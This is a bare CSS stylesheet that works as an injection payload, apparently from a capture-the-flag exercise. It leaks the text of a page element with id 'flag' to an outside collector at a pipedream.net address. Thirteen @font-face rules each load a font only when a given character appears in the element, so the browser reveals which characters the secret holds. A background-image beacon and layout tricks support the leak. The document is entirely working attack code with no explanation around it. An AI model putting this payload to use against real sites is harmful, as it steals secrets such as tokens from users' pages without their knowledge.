body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W24')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w24,p98w24,p106w24,p112w24,p115w24,p121w24,p122w24,p48w24,p49w24,p52w24,p53w24,p55w24,p125w24,monospace;width:24ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w24;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W24');unicode-range:U+0061}
@font-face{font-family:p98w24;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W24');unicode-range:U+0062}
@font-face{font-family:p106w24;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W24');unicode-range:U+006A}
@font-face{font-family:p112w24;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W24');unicode-range:U+0070}
@font-face{font-family:p115w24;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W24');unicode-range:U+0073}
@font-face{font-family:p121w24;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W24');unicode-range:U+0079}
@font-face{font-family:p122w24;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W24');unicode-range:U+007A}
@font-face{font-family:p48w24;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W24');unicode-range:U+0030}
@font-face{font-family:p49w24;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W24');unicode-range:U+0031}
@font-face{font-family:p52w24;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W24');unicode-range:U+0034}
@font-face{font-family:p53w24;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W24');unicode-range:U+0035}
@font-face{font-family:p55w24;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W24');unicode-range:U+0037}
@font-face{font-family:p125w24;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W24');unicode-range:U+007D}